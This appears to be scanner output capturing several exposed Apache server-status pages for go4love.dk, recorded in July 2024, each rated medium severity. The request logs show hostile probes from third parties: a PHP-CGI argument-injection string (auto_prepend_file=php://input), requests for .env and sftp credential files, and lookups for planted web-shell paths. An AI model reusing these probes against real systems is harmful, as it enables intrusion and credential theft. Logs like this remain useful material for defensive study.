Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 12-Jul-2024 09:38:46 CEST Restart Time: Friday, 12-Jul-2024 04:00:03 CEST Parent Server Generation: 5 Server uptime: 5 hours 38 minutes 43 seconds Total accesses: 27381 - Total Traffic: 14.0 MB CPU Usage: u.84 s.41 cu0 cs0 - .00615% CPU load 1.35 requests/sec - 721 B/second - 535 B/request 1 requests currently being processed, 30 idle workers ________W_______________.._.______.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5424570/10/848_ 0.012400.00.000.39 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 1-5422360/11/850_ 0.01000.00.000.32 64.227.32.66webhotel5.webhosting.dkGET /about HTTP/1.0 2-5424480/11/848_ 0.01000.00.000.40 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-5424750/10/878_ 0.011800.00.000.34 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-5424840/10/847_ 0.0117220.00.000.46 45.76.170.167www.tutak.dkHEAD /wordpress HTTP/1.0 5-5424430/11/798_ 0.02010.00.000.96 64.227.32.66webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 6-5426310/10/797_ 0.011610.00.000.32 45.76.170.167www.tutak.dkHEAD /new HTTP/1.0 7-5422020/11/797_ 0.02000.00.000.24 64.227.32.66webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-5424490/10/797W 0.01000.00.010.44 64.227.32.66webhotel5.webhosting.dkGET /server-status HTTP/1.0 9-5427680/10/838_ 0.011610.00.020.84 45.76.170.167www.tutak.dkHEAD /main HTTP/1.0 10-5421980/11/816_ 0.01000.00.000.26 64.227.32.66webhotel5.webhosting.dkGET /server HTTP/1.0 11-5424850/10/830_ 0.011720.00.020.33 45.76.170.167www.tutak.dkHEAD / HTTP/1.0 12-5425190/10/813_ 0.021700.00.000.31 45.76.170.167www.tutak.dkHEAD /wp HTTP/1.0 13-5422030/11/814_ 0.01000.00.000.30 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-5426220/10/758_ 0.021600.00.000.30 45.76.170.167www.tutak.dkHEAD /old HTTP/1.0 15-5425200/10/812_ 0.011600.00.000.29 45.76.170.167www.tutak.dkHEAD /bc HTTP/1.0 16-5428000/10/776_ 0.011600.00.000.24 45.76.170.167www.tutak.dkHEAD /home HTTP/1.0 17-5428030/10/759_ 0.011450.00.000.24 147.182.195.24webhotel5.webhosting.dkGET / HTTP/1.0 18-5428050/10/810_ 0.02360.00.000.72 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 19-5428060/10/810_ 0.01240.00.000.36 198.235.24.106webhotel5.webhosting.dkGET / HTTP/1.0 20-5428110/10/777_ 0.01220.00.000.36 64.227.32.66webhotel5.webhosting.dkGET / HTTP/1.0 21-5428120/10/773_ 0.01030.00.000.52 64.227.32.66webhotel5.webhosting.dkGET / HTTP/1.0 22-5428130/9/712_ 0.00000.00.000.29 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 23-5428140/10/813_ 0.00000.00.000.45 64.227.32.66webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 24-5-0/0/718. 0.0847000.00.000.24 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-5-0/0/737. 0.0846900.00.000.33 193.39.9.129webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 26-5408140/13/699_ 0.01000.00.001.43 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-5-0/0/733. 0.0840800.00.000.29 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-5420800/11/689_ 0.011380.00.000.31 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 29-5422370/11/622_ 0.01000.00.000.21 64.227.32.66webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 30-5422380/11/530_ 0.01000.00.000.17 64.227.32.66webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 31-5422390/11/494_ 0.00000.00.000.29 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-5425210/10/494_ 0.021600.00.000.21 45.76.170.167www.tutak.dkHEAD /bk HTTP/1.0 33-5425220/10/459_ 0.011600.00.000.16 45.76.170.167www.tutak.dkHEAD /backup HTTP/1.0 34-5-0/0/449. 0.0750500.00.000.20 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-4-0/0/293. 0.08426110.00.000.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-4-0/0/293. 0.06426000.00.000.08 85.203.205.124webhotel5.webhosting.dkGET /metodeogteknik/macgenealogi.html HTTP/1.0 37-4-0/0/292. 0.06426630.00.000.12 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 38-4-0/0/128. 0.07428500.00.000.09 52.230.152.88webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 39-4-0/0/128. 0.07426000.00.000.04 85.203.205.124webhotel5.webhosting.dkGET /apple-touch-icon-precomposed.png HTTP/1.0 40-2-0/0/28. 0.02951900.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /mail.php HTTP/1.0 41-2-0/0/28. 0.05951900.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-2-0/0/28. 0.03951900.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-2-0/0/28. 0.03951900.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /wp-content/content.php HTTP/1.0 44-2-0/0/28. 0.03951900.00.000.01 91.92.243.107webhotel5.webhosting.dkGET /wp-content/about.php HTTP/1.0 45-2-0/0/28. 0.02951900.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /link-manager.php HTTP/1.0 46-2-0/0/28. 0.02951900.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-2-0/0/28. 0.03951900.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-2-0/0/28. 0.03951900.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde371bd3d24
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 10-Jul-2024 06:10:43 CEST Restart Time: Wednesday, 10-Jul-2024 06:05:04 CEST Parent Server Generation: 0 Server uptime: 5 minutes 38 seconds Total accesses: 213 - Total Traffic: 275 kB CPU Usage: u.19 s0 cu0 cs0 - .0562% CPU load .63 requests/sec - 833 B/second - 1322 B/request 1 requests currently being processed, 34 idle workers ___________________________W_______............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0498460/7/7_ 0.002200.00.000.00 188.165.125.250webhotel5.webhosting.dkHEAD /SITE HTTP/1.0 1-0498470/7/7_ 0.012000.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-0498480/7/7_ 0.011010.00.000.00 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-0498490/7/7_ 0.01900.00.000.00 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-0498500/7/7_ 0.01830.00.000.00 49.7.227.204webhotel5.webhosting.dkGET / HTTP/1.0 5-0498510/7/7_ 0.00300.00.000.00 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-0498520/7/7_ 0.00130.00.000.00 159.89.17.243webhotel5.webhosting.dkGET / HTTP/1.0 7-0498530/7/7_ 0.010580.00.000.00 93.158.91.237webhotel5.webhosting.dkGET / HTTP/1.0 8-0498540/7/7_ 0.01000.00.000.00 159.89.17.243webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 9-0498550/7/7_ 0.01000.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /server HTTP/1.0 10-0498560/7/7_ 0.01000.00.000.00 159.89.17.243webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-0498570/6/6_ 0.013410.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-0498580/6/6_ 0.013400.00.010.01 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-0498590/6/6_ 0.013400.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-0498600/6/6_ 0.013340.00.000.00 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 15-0498610/6/6_ 0.013210.00.000.00 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 16-0498620/6/6_ 0.002900.00.000.00 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-0498630/6/6_ 0.002800.00.000.00 216.244.66.203webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 18-0498640/6/6_ 0.012400.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-0498650/6/6_ 0.0023670.00.200.20 81.19.232.105www.woodwind.dkGET /fotos/2k11_inv_925218_wmw.pdf HTTP/1.0 20-0498660/6/6_ 0.001300.00.000.00 184.66.62.117webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 21-0498670/6/6_ 0.00000.00.000.00 93.158.71.185webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 22-0498680/6/6_ 0.01020.00.000.00 159.89.17.243webhotel5.webhosting.dkGET / HTTP/1.0 23-0498690/6/6_ 0.00000.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 24-0498700/6/6_ 0.01010.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /about HTTP/1.0 25-0498710/6/6_ 0.01000.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 26-0498720/6/6_ 0.00000.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 27-0498740/5/5W 0.01000.00.000.00 159.89.17.243webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-0498750/5/5_ 0.005000.00.000.00 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-0498760/5/5_ 0.004300.00.000.00 192.36.109.125webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 30-0498770/5/5_ 0.014280.00.000.00 192.36.109.90webhotel5.webhosting.dkGET / HTTP/1.0 31-0498780/5/5_ 0.003500.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-0498790/5/5_ 0.003500.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-0498800/5/5_ 0.003500.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-0498810/5/5_ 0.003400.00.000.00 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde39f7ea338
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 08-Jul-2024 05:37:12 CEST Restart Time: Monday, 08-Jul-2024 04:00:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 37 minutes 8 seconds Total accesses: 7900 - Total Traffic: 3.5 MB CPU Usage: u1.95 s.95 cu0 cs0 - .0498% CPU load 1.36 requests/sec - 637 B/second - 470 B/request 3 requests currently being processed, 25 idle workers W_____..._.CC___.__.___________...___........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1154290/1/231W 0.00000.00.000.08 157.245.113.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 1-1157890/1/231_ 0.00010.00.000.08 157.245.113.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 2-1158000/0/230_ 0.072600.00.000.10 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-1158290/0/230_ 0.0816630.00.000.08 81.19.232.105webhotel5.webhosting.dkPOST / HTTP/1.0 4-1158650/0/230_ 0.06700.00.000.08 107.175.179.37webhotel5.webhosting.dkGET /.env HTTP/1.0 5-1158910/0/230_ 0.05000.00.000.09 66.249.79.35webhotel5.webhosting.dkGET /wwwdata/usserod/doc/153.html HTTP/1.0 6-1-0/0/230. 0.063300.00.000.08 193.39.9.129webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-1-0/0/230. 0.072600.00.000.11 185.125.219.13www.psykologaarhus.dkHEAD / HTTP/1.0 8-1-0/0/230. 0.071600.00.000.13 107.175.179.37webhotel5.webhosting.dkGET /.env HTTP/1.0 9-177460/49/229_ 0.0826100.00.030.09 134.122.135.136webhotel5.webhosting.dkGET / HTTP/1.0 10-1-0/0/230. 0.07000.00.000.09 62.146.237.49webhotel5.webhosting.dkGET /cgi-bin/inputs.php HTTP/1.0 11-177261/50/230C 0.08000.30.030.08 62.146.237.49webhotel5.webhosting.dkGET /wp-content/themes/inputs.php HTTP/1.0 12-177451/50/230C 0.06000.30.020.08 62.146.237.49webhotel5.webhosting.dkGET /inputs.php HTTP/1.0 13-177470/49/228_ 0.062700.00.030.09 107.175.179.37webhotel5.webhosting.dkGET /.env HTTP/1.0 14-177480/49/228_ 0.06900.00.030.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-177490/49/228_ 0.07970.00.030.09 107.175.179.37webhotel5.webhosting.dkPOST / HTTP/1.0 16-1-0/0/229. 0.07700.00.000.10 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-177530/49/228_ 0.07000.00.020.09 157.245.113.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 18-177510/49/228_ 0.06100.00.020.09 62.146.237.49webhotel5.webhosting.dkGET /radio.php HTTP/1.0 19-1-0/0/179. 0.07133100.00.000.34 62.146.237.49webhotel5.webhosting.dkGET /wp-includes/js/tinymce/plugins/compat3x/ HTTP/1.0 20-177540/49/228_ 0.06010.00.030.08 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 21-177550/49/228_ 0.07000.00.030.10 62.146.237.49webhotel5.webhosting.dkGET /images/inputs.php HTTP/1.0 22-178240/48/227_ 0.072500.00.040.10 194.67.207.9www.psykologaarhus.dkHEAD / HTTP/1.0 23-178260/48/227_ 0.072320.00.030.09 198.235.24.57webhotel5.webhosting.dkGET / HTTP/1.0 24-178270/48/227_ 0.072000.00.020.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-178280/48/227_ 0.062000.00.020.15 216.244.66.196webhotel5.webhosting.dkGET /Album/moncler/hooded-down-coat-24.html HTTP/1.0 26-179670/47/226_ 0.07900.00.020.09 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-179680/48/227_ 0.06220.00.040.18 157.245.113.227webhotel5.webhosting.dkGET / HTTP/1.0 28-179690/48/227_ 0.06530.00.020.07 157.245.113.227webhotel5.webhosting.dkGET / HTTP/1.0 29-179700/48/198_ 0.05400.00.030.07 114.119.159.6webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 30-179710/48/198_ 0.07200.00.030.07 157.245.113.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 31-1-0/0/150. 0.0624700.00.000.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-1-0/0/100. 0.06000.00.000.05 157.245.113.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-1-0/0/100. 0.07000.00.000.04 62.146.237.49webhotel5.webhosting.dkGET /wp-content/inputs.php HTTP/1.0 34-179720/48/98_ 0.07200.00.030.04 157.245.113.227webhotel5.webhosting.dkGET /server HTTP/1.0 35-179730/48/77_ 0.07100.00.030.03 157.245.113.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 36-179740/48/77_ 0.07100.00.030.04 157.245.113.227webhotel5.webhosting.dkGET /about HTTP/1.0 37-0-0/0/29. 0.04222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-0-0/0/29. 0.05222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-0-0/0/29. 0.04222800.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-0-0/0/29. 0.06222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-0-0/0/29. 0.06222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-0-0/0/29. 0.05222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-0-0/0/29. 0.07222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-0-0/0/29. 0.07222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-0-0/0/29. 0.05222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-0-0/0/29. 0.05222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-0-0/0/29. 0.04222800.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3c5001d52
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 06-Jul-2024 19:37:56 CEST Restart Time: Saturday, 06-Jul-2024 16:05:04 CEST Parent Server Generation: 3 Server uptime: 3 hours 32 minutes 52 seconds Total accesses: 11370 - Total Traffic: 8.0 MB CPU Usage: u2.01 s1.09 cu0 cs0 - .0243% CPU load .89 requests/sec - 655 B/second - 736 B/request 1 requests currently being processed, 32 idle workers ___._W____.________________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3562440/2/363_ 0.004800.00.000.19 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-3592020/0/354_ 0.08120.00.000.28 206.81.12.187webhotel5.webhosting.dkGET / HTTP/1.0 2-3581420/0/354_ 0.07493930.00.000.42 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 3-3-0/0/354. 0.06000.00.000.20 206.81.12.187webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 4-3585950/0/355_ 0.072000.00.000.23 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-3430920/49/353W 0.06000.00.010.19 206.81.12.187webhotel5.webhosting.dkGET /server-status HTTP/1.0 6-3430760/49/357_ 0.075600.00.020.22 75.74.123.212webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-3581550/0/355_ 0.084700.00.000.18 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-3586420/0/355_ 0.081900.00.000.21 213.180.203.115www.valloe.orgGET /robots.txt HTTP/1.0 9-3583530/0/354_ 0.072600.00.000.31 52.167.144.190webhotel5.webhosting.dkgrammer/mig-og-min-mor/video/tillykke-med-dagen-dorthe HTTP/1.0 10-3-0/0/354. 0.09000.00.000.25 206.81.12.187webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-3430930/49/352_ 0.095700.00.020.24 81.19.232.105webhotel5.webhosting.dkGET /app/ext.php?u=https://www.ifitt.org/ HTTP/1.0 12-3430940/49/354_ 0.064900.00.010.28 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-3430980/49/353_ 0.084900.00.120.29 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-3431160/49/353_ 0.084900.00.020.26 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-3431330/49/353_ 0.0732430.00.010.13 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 16-3431340/49/353_ 0.0719110.00.050.22 14.9.97.161webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-3431430/49/354_ 0.081600.00.080.21 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-3431440/49/353_ 0.07110.00.040.24 206.81.12.187webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-3431450/49/354_ 0.08200.00.020.21 206.81.12.187webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 20-3431530/49/351_ 0.06100.00.010.25 206.81.12.187webhotel5.webhosting.dkGET /server HTTP/1.0 21-3431750/49/303_ 0.07010.00.020.38 206.81.12.187webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 22-3476850/31/278_ 0.035700.00.020.15 81.19.232.105webhotel5.webhosting.dkGET /app/ext.php?u=https://www.ifitt.org/ HTTP/1.0 23-3577390/1/211_ 0.0042430.00.000.10 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 24-3580750/0/253_ 0.085600.00.000.09 91.92.241.45webhotel5.webhosting.dkGET /jp.php HTTP/1.0 25-3590050/0/255_ 0.08720.00.000.20 66.249.66.37webhotel5.webhosting.dkGET /torben/posters.htm HTTP/1.0 26-3586430/0/245_ 0.071900.00.000.31 176.255.31.225www.valloe.orgGET /robots.txt HTTP/1.0 27-3430840/49/244_ 0.074810.00.010.19 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 28-3590640/0/246_ 0.07530.00.000.17 95.108.213.217www.valloe.orgGET /blues/bbd0510.htm HTTP/1.0 29-3592370/0/244_ 0.08000.00.000.25 206.81.12.187webhotel5.webhosting.dkGET /about HTTP/1.0 30-3591610/0/150_ 0.05200.00.000.22 216.24.216.236webhotel5.webhosting.dkGET /wp-admin/maint/wp-login.php HTTP/1.0 31-3592030/0/160_ 0.05100.00.000.10 216.24.216.236webhotel5.webhosting.dkGET /wp-admin/file.php HTTP/1.0 32-3592380/0/110_ 0.07000.00.000.03 216.24.216.236webhotel5.webhosting.dkGET /wp-content/themes/digital-download/new.php HTTP/1.0 33-3592390/0/110_ 0.06020.00.000.04 81.19.232.105www.sydsjaellandsgarderforeningGET /s_dag_10.php HTTP/1.0 34-3592400/0/110_ 0.05000.00.000.04 216.24.216.236webhotel5.webhosting.dkGET /wp-admin/maint/repair.php HTTP/1.0 35-2-0/0/97. 0.06312130.00.000.04 81.19.232.105www.sydsjaellandsgarderforeningGET /gen_for_20.php HTTP/1.0 36-2-0/0/98. 0.05312700.00.000.04 216.24.216.236webhotel5.webhosting.dkGET /options-discussion.php HTTP/1.0 37-2-0/0/98. 0.073125170.00.000.08 81.19.232.105www.sydsjaellandsgarderforeningGET /som_tur_22.php HTTP/1.0 38-2-0/0/98. 0.06312200.00.000.03 216.24.216.236webhotel5.webhosting.dkGET /.well-known/pki-validation/bless.php HTTP/1.0 39-3-0/0/143. 0.07700.00.000.26 96.36.152.99webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 40-3-0/0/143. 0.06540.00.000.10 206.81.12.187webhotel5.webhosting.dkGET / HTTP/1.0 41-0-0/0/48. 0.05946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-0-0/0/48. 0.07946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-0-0/0/48. 0.06946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-0-0/0/48. 0.06946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-0-0/0/48. 0.06946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-0-0/0/48. 0.07946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-0-0/0/48. 0.06946600.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3d05fbff8
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 04-Jul-2024 16:05:29 CEST Restart Time: Thursday, 04-Jul-2024 16:05:04 CEST Parent Server Generation: 0 Server uptime: 25 seconds Total accesses: 171 - Total Traffic: 48 kB CPU Usage: u.02 s0 cu0 cs0 - .08% CPU load 6.84 requests/sec - 1966 B/second - 287 B/request 1 requests currently being processed, 34 idle workers ______W____________________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: 